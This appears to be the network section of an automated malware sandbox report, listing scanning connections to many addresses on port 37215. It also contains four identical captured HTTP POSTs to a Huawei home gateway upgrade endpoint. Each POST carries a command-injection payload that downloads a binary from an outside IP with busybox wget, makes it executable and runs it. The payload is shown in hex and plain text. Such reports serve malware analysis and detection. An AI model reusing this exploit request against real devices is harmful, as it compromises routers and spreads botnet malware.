          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.96.174.188:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.11.219.115:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.93.162.145:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.8.35.176:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.71.214.191:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.94.127.215:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.194.218.244:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.157.183.166:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.103.34.24:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.128.80.18:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.244.229.103:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.63.207.146:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.244.74.97:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.233.35.119:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.161.204.58:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.26.177.47:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.121.67.115:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.37.170.184:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.30.87.129:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.116.219.180:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.222.60.234:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.119.109.121:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.240.8.17:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.148.222.226:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.226.227.242:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.107.251.207:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.86.19.134:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.85.173.78:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.137.164.204:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.185.168.131:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.46.204.22:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.168.73.165:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.27.70.58:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.164.173.126:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.155.193.243:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.216.175.56:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.255.61.204:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.165.21.95:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.101.133.72:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.43.49.68:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.111.134.205:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.49.146.74:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.153.177.229:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.187.44.38:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.114.6.205:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.77.113.3:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.248.239.198:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.40.92.52:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.169.150.140:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.205.18.148:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.195.193.158:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.158.11.39:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.91.52.4:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.255.188.195:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.253.251.183:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.192.204.229:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.189.252.40:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.108.233.91:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.188.254.65:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.133.115.187:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.101.59.221:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.150.182.92:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.84.141.28:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.187.181.36:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.232.137.53:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.5.145.252:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.9.60.0:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.93.147.84:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.90.157.65:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.149.94.118:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.16.145.223:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.170.9.119:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.245.252.3:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.38.117.37:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.225.26.99:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.119.45.140:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.132.215.236:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.254.165.134:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.76.83.149:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.46.41.75:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.43.176.162:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.104.148.234:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.175.147.49:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.190.206.231:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.100.64.233:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.20.208.235:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.154.20.240:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.195.184.47:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.40.165.141:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.173.109.148:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.161.25.122:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.123.231.210:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.165.33.104:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.242.97.155:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.95.175.70:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.59.163.255:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.49.58.186:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.11.208.178:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.15.246.39:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.234.91.193:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.227.130.62:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.253.109.91:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.49.206.14:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.100.246.78:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.148.42.91:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.160.103.124:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.58.217.203:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.131.214.103:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.232.14.9:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.68.156.83:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.188.14.111:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.163.223.183:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.176.105.245:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.192.208.234:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.110.164.146:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.231.51.109:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.111.247.93:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.197.6.89:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.245.64.231:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.44.12.240:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.17.112.78:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.184.101.88:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.142.5.8:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.77.212.120:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.222.138.53:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.39.143.208:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.35.169.58:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.148.158.55:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.181.6.227:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.247.69.171:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.233.49.1:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.119.181.122:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.9.112.19:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.248.81.99:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.124.204.44:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.18.6.36:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.141.4.21:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.234.250.106:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.90.201.146:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.224.156.179:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.18.210.194:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.41.177.200:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.11.25.186:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.149.167.163:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.69.184.161:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.167.55.151:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.187.183.84:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.90.241.116:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.196.86.88:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.117.219.207:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.10.31.89:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.149.237.93:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.67.205.115:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.70.141.58:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.8.139.86:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.120.12.185:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.136.218.164:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.5.253.67:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.194.216.173:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.224.186.155:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.216.206.169:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.89.53.22:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.138.194.115:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.110.201.242:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.119.157.229:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.19.13.173:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.139.241.97:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.164.97.252:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.81.162.162:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.160.169.59:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.61.78.70:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.41.122.253:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.236.130.115:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.21.38.22:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.33.122.240:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.156.219.156:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.159.255.22:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.53.23.63:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.173.247.113:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.71.143.81:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.237.224.46:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.100.115.65:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.52.206.83:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.186.226.16:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.232.154.213:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.4.143.226:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.5.161.89:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.106.154.38:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.118.205.254:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.56.228.33:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.25.77.91:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.153.124.39:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.129.245.125:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.41.102.9:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.53.206.55:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.105.58.81:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.20.31.43:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.173.247.181:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.170.119.134:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.192.185.222:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.34.139.250:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.221.222.47:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.23.200.104:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.105.92.233:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.15.192.154:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.129.46.64:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.4.103.22:37215
          Source: global trafficTCP traffic: 192.168.2.15:22397 -> 41.184.158.204:37215
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
